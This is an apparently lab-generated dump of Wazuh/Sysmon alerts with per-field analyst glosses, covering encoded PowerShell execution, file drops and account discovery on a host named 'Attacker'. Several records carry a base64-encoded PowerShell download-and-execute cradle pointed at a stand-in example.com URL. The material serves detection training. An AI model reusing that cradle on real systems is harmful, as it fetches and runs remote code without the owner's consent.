data.win.system.systemTime: 2025-04-24T22:33:22.8414954Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280341 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-24 22:33:22.836
ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath
Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.115\elevation_service.exe"
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:22.836 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.115\\elevation_service.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.770075 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:31.7625296Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280554 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:30.374
ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00}
ProcessId: 11408
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00}
ParentProcessId: 4172
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:30.374 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc3a-680a-340a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc37-680a-320a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4172 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.778141 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:32.4979169Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280555 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:33:32.489
ProcessGuid: {94294ddc-bc3a-680a-340a-000000000e00}
ProcessId: 11408
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tejp41b.qrm.ps1
CreationUtcTime: 2025-04-24 22:33:32.489
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:32.489 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc3a-680a-340a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3tejp41b.qrm.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:33:32.489 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.780909 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:46.6613401Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280712 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:45.664
ProcessGuid: {94294ddc-bc49-680a-410a-000000000e00}
ProcessId: 6832
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00}
ParentProcessId: 7368
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:45.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc49-680a-410a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc47-680a-3f0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 7368 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534205.788971 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:33:51.1645018Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 280763 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:33:51.154
ProcessGuid: {94294ddc-bc4f-680a-460a-000000000e00}
ProcessId: 11932
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:33:51.154 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bc4f-680a-460a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
